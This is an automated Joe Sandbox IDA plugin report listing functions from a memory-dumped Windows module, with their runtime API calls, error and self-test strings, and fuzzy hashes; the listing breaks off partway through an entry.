Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 39012651-1139078987
Opcode ID: 0e3b07bcedb47b1cf496e1069a7e0bc1b51a3c8d72ac8218bece0dd429a3ea31
Instruction ID: 5b624dcf053c69c6f27f604f3173c6d8410af80a722ec90a687531dca4cace96
Opcode Fuzzy Hash: 0e3b07bcedb47b1cf496e1069a7e0bc1b51a3c8d72ac8218bece0dd429a3ea31
Instruction Fuzzy Hash: 344170711083C0AED334CB58C845F9FBBE8ABD9354F104E6EF1999B281DB7595088BA7

Uniqueness

Uniqueness Score: -1.00%

Function 6F8ABEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8ABF2D

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

Strings

gfff, xrefs: 6F8ABF37
gfff, xrefs: 6F8ABF80
vector<T> too long, xrefs: 6F8ABF28

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 791ab5be7424d13a021eb52ce337afe346568caabaf603bcd88b452b045a66ef
Instruction ID: 733338fe67454c15dfd4bd59185d7262361dc1a95f9016740cc60607b92ffc26
Opcode Fuzzy Hash: 791ab5be7424d13a021eb52ce337afe346568caabaf603bcd88b452b045a66ef
Instruction Fuzzy Hash: 4B31C5B1A00609AFC718CF5DD880E6AF7B9EB88310F148A6DE9599B780D731B904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D8F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(8E16AAE4,8E16AAE4,?,00000000), ref: 6F8D8F7F
GetLastError.KERNEL32(0000000A,?,00000000), ref: 6F8D8F8F

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8D9014

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

Timer: QueryPerformanceCounter failed with error , xrefs: 6F8D8FA5

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceCounter failed with error
API String ID: 1823523280-4075696077
Opcode ID: 9ad45ff4f239a3c91717682dd108e4c128d727cd6792297390f1f84c95af51bf
Instruction ID: b8e251d2cef0bb8448fa9c333a09b7ad5be43d04791208100db61499acdb1bb4
Opcode Fuzzy Hash: 9ad45ff4f239a3c91717682dd108e4c128d727cd6792297390f1f84c95af51bf
Instruction Fuzzy Hash: E0212AB1108380AFD310DF28D841B9BB7E8FF89258F404E5EF5A996281DB3595048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D8E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(8E16AAE4,8E16AAE4), ref: 6F8D8E7F
GetLastError.KERNEL32(0000000A), ref: 6F8D8E8F

Part of subcall function 6F874010: std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

__CxxThrowException@8.LIBCMT ref: 6F8D8F14

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 6F8D8EA5

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceFrequency failed with error
API String ID: 2175244869-348333943
Opcode ID: 2b93b0c6f0570c4388eb9ba7c40138b4fca84ceff3f140865f4d28c94047b90a
Instruction ID: 70f9059a930c3ea563fb7f045fbec873699a1dfb4b1ca3bba7ac7a5e9a8fa89b
Opcode Fuzzy Hash: 2b93b0c6f0570c4388eb9ba7c40138b4fca84ceff3f140865f4d28c94047b90a
Instruction Fuzzy Hash: 47213BB150C380AFD310DF28C841B9BB7E8FF89254F404E5EF5A986281DB359504CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A6480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6F8A6518

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

__CxxThrowException@8.LIBCMT ref: 6F8A6558

Strings

Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6F8A6527
Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6F8A64E7

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: 70c60409001f10fc4ca485bfb804540b3da6ead3a50aca2eefc26be79584415f
Instruction ID: d32907349a51f2fe7a0cd22ac503ee5fd96c40d092cb22e2eeaea5f78057a85e
Opcode Fuzzy Hash: 70c60409001f10fc4ca485bfb804540b3da6ead3a50aca2eefc26be79584415f
Instruction Fuzzy Hash: 0921F671108780AED324DB6CC840B9AB3E8FF86358F404E9EE5455A2C8EB35A005CE63

Uniqueness

Uniqueness Score: -1.00%

Function 6F8AC120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F8AC14E

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

Strings

gfff, xrefs: 6F8AC15A
gfff, xrefs: 6F8AC129
vector<T> too long, xrefs: 6F8AC149

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: ad40807263e507ae56640a1f34825f22be0ab814f0e35c27b70a703dbb5753e4
Instruction ID: a2bfc0031b80b9f3af5c728618a0e1bee68e847823e16ec9dfa0e3aae3e28d8a
Opcode Fuzzy Hash: ad40807263e507ae56640a1f34825f22be0ab814f0e35c27b70a703dbb5753e4
Instruction Fuzzy Hash: 7801AD73F040291F8311993EEE4044AFA97AAC5294319CA7AEA08DF349E572DC0286C2

Uniqueness

Uniqueness Score: -1.00%

Function 6F8B25D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6F8B2677
_memmove.LIBCMT ref: 6F8B26E6
_memmove.LIBCMT ref: 6F8B2746
__CxxThrowException@8.LIBCMT ref: 6F8B27CD

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID:
API String ID: 2655171816-0
Opcode ID: 6d3a9fac051cf0f86f1bede2085f62683caf94ee99e34554e9f1adf93fb88a17
Instruction ID: 906c5873179864eb1cef269c273d056b972541e5e2c4711062e9e0661587d2a8
Opcode Fuzzy Hash: 6d3a9fac051cf0f86f1bede2085f62683caf94ee99e34554e9f1adf93fb88a17
Instruction Fuzzy Hash: AE51AE753087069FD709DF68C980A5EB7E9AFC9710F104D6DE495CB340EB38E9068B96

Uniqueness

Uniqueness Score: -1.00%

Function 6F88D4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F88D5E4
__CxxThrowException@8.LIBCMT ref: 6F88D5F9
std::exception::exception.LIBCMT ref: 6F88D608
__CxxThrowException@8.LIBCMT ref: 6F88D61D

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 407888b393abeff580638bd70eb8c5fd101f3b91ef4cf9abe9626b2aa291a74b
Instruction ID: 8e91160e9d7f8e5400114376b5a1f6781eea63238a0470b411ff7b181f3111b9
Opcode Fuzzy Hash: 407888b393abeff580638bd70eb8c5fd101f3b91ef4cf9abe9626b2aa291a74b
Instruction Fuzzy Hash: 6A512CB1A01749AFC704CFA8C980A99BBF4FF49304F5086AAE419DB781D771E954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F895F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F896035
__CxxThrowException@8.LIBCMT ref: 6F89604A
std::exception::exception.LIBCMT ref: 6F896059
__CxxThrowException@8.LIBCMT ref: 6F89606E

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 746236d03ed736786e8e636a334a578bb89437aef83619ddf7b6acb448a0898f
Instruction ID: 7084323cadd339ab91c7002a0d09df9b3b7315a742d5756e2970830a12ad2d85
Opcode Fuzzy Hash: 746236d03ed736786e8e636a334a578bb89437aef83619ddf7b6acb448a0898f
Instruction Fuzzy Hash: 46513EB1A00709AFC704CF6CC980A99BBF4FF09314F5086AAE419DB781D771E954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6F88DE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6F88DE81
VariantClear.OLEAUT32(?), ref: 6F88DF3C
VariantClear.OLEAUT32(?), ref: 6F88DF6D
VariantClear.OLEAUT32(?), ref: 6F88DF8B

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: ab4e1d9095407ede93e053452982e360588631010bc6b3bc08511542b97313cb
Instruction ID: 6796d2642ef6fe847feb40abceb7cf51b5dec90280a8fd5379f771ed770f3a24
Opcode Fuzzy Hash: ab4e1d9095407ede93e053452982e360588631010bc6b3bc08511542b97313cb
Instruction Fuzzy Hash: AE4188326086419FD700DF29C940A5AB7E9FF9A760F048AAEF9549B350D731E805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F895DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F895E87
__CxxThrowException@8.LIBCMT ref: 6F895E9C
std::exception::exception.LIBCMT ref: 6F895EAB
__CxxThrowException@8.LIBCMT ref: 6F895EC0

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: c94916d543d2d620c94deefcfb7efad297f95abf0a7570abc6a1035ace6b59a0
Instruction ID: 7438de091443a0f057c8000b983db2b091715e54887ecb6ec2d4d7e6a184ac23
Opcode Fuzzy Hash: c94916d543d2d620c94deefcfb7efad297f95abf0a7570abc6a1035ace6b59a0
Instruction Fuzzy Hash: 1F412AB1901748AFC724CFACC980A9ABBF4FF19304F4049AEE45A9B781D771E504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F88D360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F88D437
__CxxThrowException@8.LIBCMT ref: 6F88D44C
std::exception::exception.LIBCMT ref: 6F88D45B
__CxxThrowException@8.LIBCMT ref: 6F88D470

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 15f57f8277bf377d3cc29a3a2ad81515c02cd2259e0386bb52e268e2bdc08325
Instruction ID: 01bcedee37b78033b7722f50875053c8b532199564f5079a54d3613bbd564711
Opcode Fuzzy Hash: 15f57f8277bf377d3cc29a3a2ad81515c02cd2259e0386bb52e268e2bdc08325
Instruction Fuzzy Hash: 3B413AB1901748AFC714CFA8C880A9ABBF4FF19304F4049AEE95A9B781D771F504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8D2B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 6F8A6480: __CxxThrowException@8.LIBCMT ref: 6F8A6518
Part of subcall function 6F8A6480: __CxxThrowException@8.LIBCMT ref: 6F8A6558

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F8D2C9A
__CxxThrowException@8.LIBCMT ref: 6F8D2CB1
std::exception::exception.LIBCMT ref: 6F8D2CC3
__CxxThrowException@8.LIBCMT ref: 6F8D2CDA

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$_malloc
String ID:
API String ID: 3942750879-0
Opcode ID: eec0df1b1b667ddd2b597db46e8abc7d9e51d4499081f7f55d844b26028ed360
Instruction ID: 823cd22eaf5b851e2955de9f136ae7286a190152b1e1524c3e0b0b2875152c69
Opcode Fuzzy Hash: eec0df1b1b667ddd2b597db46e8abc7d9e51d4499081f7f55d844b26028ed360
Instruction Fuzzy Hash: 6D4179B1518700AFC314CF69C880A4AFBF4FF99314F508E6EF19A8B690D775A508CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F89B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6F8F02A0), ref: 6F89B5D5
VariantInit.OLEAUT32(?), ref: 6F89B5E2
VariantClear.OLEAUT32(?), ref: 6F89B685
VariantClear.OLEAUT32(6F8F02A0), ref: 6F89B68B

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
